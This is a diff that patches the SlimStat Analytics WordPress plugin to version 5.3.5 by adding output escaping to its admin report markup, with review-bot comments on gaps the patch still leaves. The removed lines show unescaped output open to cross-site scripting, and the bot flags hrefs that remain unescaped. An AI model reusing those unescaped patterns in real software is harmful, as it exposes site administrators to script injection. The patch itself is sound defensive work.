--- a/wp-slimstat/admin/view/wp-slimstat-reports.php
+++ b/wp-slimstat/admin/view/wp-slimstat-reports.php
@@ -1455,15 +1455,15 @@
}
foreach ($results as $a_result) {
- echo "<p class='slimstat-tooltip-trigger'>" . $a_result[ 'notes' ];
+ echo "<p class='slimstat-tooltip-trigger'>" . esc_html( $a_result[ 'notes' ] );
if (!empty($a_result['counthits'])) {
- echo sprintf('<span>%s</span>', $a_result[ 'counthits' ]);
+ echo sprintf('<span>%s</span>', esc_html( $a_result[ 'counthits' ] ));
}
if (!empty($a_result['dt'])) {
$date_time = date_i18n(get_option('date_format') . ' ' . get_option('time_format'), $a_result['dt'], true);
- echo '<b class="slimstat-tooltip-content">' . __('IP', 'wp-slimstat') . ': ' . $a_result['ip'] . '<br/>' . __('Page', 'wp-slimstat') . sprintf(": <a href='%s%s'>%s%s</a><br>", $blog_url, $a_result[ 'resource' ], $blog_url, $a_result[ 'resource' ]) . __('Coordinates', 'wp-slimstat') . sprintf(': %s<br>', $a_result[ 'position' ]) . __('Date', 'wp-slimstat') . (': ' . $date_time);
+ echo '<b class="slimstat-tooltip-content">' . __('IP', 'wp-slimstat') . ': ' . esc_html( $a_result['ip'] ) . '<br/>' . __('Page', 'wp-slimstat') . sprintf(": <a href='%s'>%s</a><br>", esc_url( $blog_url . $a_result[ 'resource' ] ), esc_html( $blog_url . $a_result[ 'resource' ] )) . __('Coordinates', 'wp-slimstat') . sprintf(': %s<br>', esc_html( $a_result[ 'position' ] )) . __('Date', 'wp-slimstat') . (': ' . $date_time);
}
echo '</b></p>';
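Review bot: `$date_time` on the new line is still concatenated into the tooltip unescaped while every other value in the same echo now passes through esc_html(); it is produced by date_i18n() from the site's date_format/time_format options, so the exposure is limited to what an administrator stores there, but `esc_html( $date_time )` would leave the line uniformly escaped rather than relying on that assumption. The translated labels such as `__('IP', 'wp-slimstat')` are likewise output raw, where `esc_html__( 'IP', 'wp-slimstat' )` is the usual form for text nodes. The foreach body that contains this echo closes outside the hunk.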
@@ -1514,7 +1514,7 @@
$a_result['counthits'] = 0;
}
- $a_result['resource'] = "<a class='slimstat-font-logout slimstat-tooltip-trigger' target='_blank' title='" . htmlentities(__('Open this URL in a new window', 'wp-slimstat'), ENT_QUOTES, 'UTF-8') . "' href='" . htmlentities($a_result['resource'], ENT_QUOTES, 'UTF-8') . "'></a> <a class='slimstat-filter-link' href='" . wp_slimstat_reports::fs_url('resource equals ' . htmlentities($a_result['resource'], ENT_QUOTES, 'UTF-8')) . "'>" . self::get_resource_title($a_result['resource']) . '</a>';
+ $a_result['resource'] = "<a class='slimstat-font-logout slimstat-tooltip-trigger' target='_blank' title='" . esc_attr(__('Open this URL in a new window', 'wp-slimstat')) . "' href='" . esc_url($a_result['resource']) . "'></a> <a class='slimstat-filter-link' href='" . wp_slimstat_reports::fs_url('resource equals ' . $a_result['resource']) . "'>" . self::get_resource_title($a_result['resource']) . '</a>';
$group_markup = [];
if (!empty($a_result['column_group'])) {
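Review bot: The second href on the new line, built from `wp_slimstat_reports::fs_url('resource equals ' . $a_result['resource'])`, is written into the attribute with no visible escaping, and the new side also drops the htmlentities() the old line applied to the value before passing it, so fs_url now receives the raw resource string. Unless fs_url attribute-escapes and URL-encodes its own return value (not visible in this diff), wrapping it as `esc_url( wp_slimstat_reports::fs_url( 'resource equals ' . $a_result['resource'] ) )` would make this anchor consistent with the esc_url() applied to the first anchor on the same line. The same unescaped `self::fs_url(...)` href appears on both `$group_markup[]` lines of the hunk at -1523. The enclosing function starts and ends outside this hunk.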
@@ -1523,14 +1523,14 @@
foreach ($exploded_group as $a_item) {
$user = get_user_by('login', $a_item);
if ($user) {
- $group_markup[] = '<a class="slimstat-filter-link" title="' . __('Filter by element in a group', 'wp-slimstat') . '" href="' . self::fs_url($_args['column_group'] . ' equals ' . $a_item) . '">' . get_avatar($user->ID, 16) . $user->display_name . '</a>';
+ $group_markup[] = '<a class="slimstat-filter-link" title="' . esc_attr(__('Filter by element in a group', 'wp-slimstat')) . '" href="' . self::fs_url($_args['column_group'] . ' equals ' . $a_item) . '">' . get_avatar($user->ID, 16) . esc_html( $user->display_name ) . '</a>';
} else {
- $group_markup[] = '<a class="slimstat-filter-link" title="' . __('Filter by element in a group', 'wp-slimstat') . '" href="' . self::fs_url($_args['column_group'] . ' equals ' . $a_item) . '">' . $a_item . '</a>';
+ $group_markup[] = '<a class="slimstat-filter-link" title="' . esc_attr(__('Filter by element in a group', 'wp-slimstat')) . '" href="' . self::fs_url($_args['column_group'] . ' equals ' . $a_item) . '">' . esc_html( $a_item ) . '</a>';
}
}
}
- echo sprintf('<p>%s <span>%s</span><br/>', $a_result[ 'resource' ], $a_result[ 'counthits' ]) . implode(', ', $group_markup) . '</p>';
+ echo sprintf('<p>%s <span>%s</span><br/>', $a_result[ 'resource' ], esc_html( $a_result[ 'counthits' ] )) . implode(', ', $group_markup) . '</p>';
}
if (! defined('DOING_AJAX') || ! DOING_AJAX) {
@@ -1944,7 +1944,7 @@
}
if ([] !== $term_names) {
- self::$resource_titles[$cache_index] = implode(',', $term_names);
+ self::$resource_titles[$cache_index] = esc_html( implode(',', $term_names) );
} else {
self::$resource_titles[$cache_index] = htmlspecialchars(self::$resource_titles[$cache_index], ENT_QUOTES, 'UTF-8');
}
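Review bot: The two branches now escape the same cache slot with different functions — `esc_html()` on the new line and `htmlspecialchars(..., ENT_QUOTES, 'UTF-8')` on the unchanged else branch — so the stored title's encoding depends on which path filled it. Using the WordPress helper in both, `self::$resource_titles[$cache_index] = esc_html(self::$resource_titles[$cache_index]);`, keeps the cache uniform; note that esc_html() does not double-encode entities already present whereas htmlspecialchars() does, so confirm the else branch does not depend on that before changing it. The enclosing method starts and ends outside the hunk.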
--- a/wp-slimstat/wp-slimstat.php
+++ b/wp-slimstat/wp-slimstat.php
@@ -3,7 +3,7 @@
* Plugin Name: SlimStat Analytics
* Plugin URI: https://wp-slimstat.com/
* Description: The leading web analytics plugin for WordPress
- * Version: 5.3.4
+ * Version: 5.3.5
* Author: Jason Crouse, VeronaLabs
* Text Domain: wp-slimstat
* Domain Path: /languages
@@ -24,7 +24,7 @@
}
// Set the plugin version and directory
-define('SLIMSTAT_ANALYTICS_VERSION', '5.3.4');
+define('SLIMSTAT_ANALYTICS_VERSION', '5.3.5');
define('SLIMSTAT_FILE', __FILE__);
define('SLIMSTAT_DIR', __DIR__);
define('SLIMSTAT_URL', plugins_url('', __FILE__));
@@ -999,9 +999,9 @@
case 'post_link_no_qs':
$post_id = url_to_postid($a_result['resource']);
if ($post_id > 0) {
- $output[$result_idx][$a_column] .= sprintf("<a href='%s'>", $a_result[ 'resource' ]) . get_the_title($post_id) . '</a>';
+ $output[$result_idx][$a_column] .= sprintf("<a href='%s'>", esc_url( $a_result[ 'resource' ] )) . esc_html( get_the_title($post_id) ) . '</a>';
} else {
- $output[$result_idx][$a_column] .= sprintf("<a href='%s'>%s</a>", $a_result[ 'resource' ], $a_result[ 'resource' ]);
+ $output[$result_idx][$a_column] .= sprintf("<a href='%s'>%s</a>", esc_url( $a_result[ 'resource' ] ), esc_html( $a_result[ 'resource' ] ));
}
break;
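Review bot: The two branches of the new code repeat the same `sprintf("<a href='%s'>", esc_url(...))` prefix and differ only in the link text, which invites the two escapes to drift apart on a later edit. Computing the pieces once — `$href = esc_url( $a_result['resource'] );`, `$label = $post_id > 0 ? get_the_title( $post_id ) : $a_result['resource'];`, `$output[$result_idx][$a_column] .= sprintf( "<a href='%s'>%s</a>", $href, esc_html( $label ) );` — produces the same markup with a single escaping site for each context. The enclosing switch starts and ends outside the hunk.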